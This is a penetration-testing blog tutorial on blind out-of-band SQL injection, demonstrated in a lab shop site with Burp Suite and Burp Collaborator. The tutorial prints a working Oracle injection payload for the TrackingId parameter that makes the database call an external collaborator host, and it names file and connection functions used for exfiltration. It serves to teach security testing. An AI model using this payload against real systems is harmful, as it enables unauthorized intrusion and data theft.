Greeting everyone! Hope everything is going good!
Today in this blog we Will Discuss How Blind out-of-band SQLI Work? What an attacker manipulate through Out-of-band technique today we will go through complete practical session either this type of attacks are not new for you.
Main Goal of Blind Out-of-band attack cause Lack of input validation on web application of-band SQL injection attack exfiltrate data through outbound channel, can be either DNS or HTTP protocol. As Out-of -band Techniques allow an attacker or Tester to perform Verify and exploit vulnerability which is based of Blind . In Out-of-band Attacker or tester do not get output of exploit directly .
Function that can be file operation function (for instance: load_file(), master..xp_dirtree) or establish connection function (for instance: DBMS_LDAP.INIT, UTL_HTTP.request).
Is Your Website is vulnerable For Blind SQLI With OOB?
- Weak Implementation Of Input Validation
- Network environment that allow targeted server to initiate outbound request protocol such as DNS or http to public without restriction of security perimeter.
How To Test For Blind Out of band SQLI:
Here We Will Go Through Demonstrate Against Security loopholes Here We will Use burp Collaborator to Perform Successful Attack against our targeted Domain .
As Using Burp collaborator Client blind SQLI OOB Which we can verify by using payload that trigger an Interaction with an external system which verify against vulnerability .
Now , Here We have Our lab Now we are in vulnerable shop Website Which is vulnerable for Blind SQLI OOB , As above we have different product items for checkout ,
We See We have different Products Section Click On any Product page And now You will Redirect to Product Page.
Now To check page http request and response section which make our testing phase more easy here we will use burp suite to capture out going Request.
As above picture we see TrackingId= Parameter which is vulnerable for SQLI With OOB
Now, To check against issue we will use burp collaborator client for external interaction As Below Picture we have Burp collaborator client.
Now We copied Server address from Burp collaborator client for checking against issue and now As above we Use SQL Payload With Injecting OOB Techniques x’+UNION+SELECT+extractvalue(xmltype(‘<%3fxml+version%3d”1.0″+encoding%3d”UTF-8″%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+”http%3a//efxwhrpyejj3chvcyq47dny970dq1f.burpcollaborator.net/”>+%25remote%3b]>’),’/l’)+FROM+dual–.
We change TrackingId= Value As above payload,
As Server Response we got 200 And By manipulating external interaction With DNS Or HTTP which successfully verified Domain Is Vulnerable for OOB As
It interact through external server Through SQL Payload. As now which based you can simply check the logs of your DNS server and check what the exfiltrated information was manipulated.
Conclusion: In this Blog we Discussed How Blind SQLI Work with help of OOB Request We Successfully verified How OOB Help us to External Interaction And Verify Possibility Exploit Against Targeted Server .
Thanks For Reading……. See You In Another Blog!
Stick With Our Blog : Click Here
Author
Pallab Jyoti Borah
VAPT Analyst
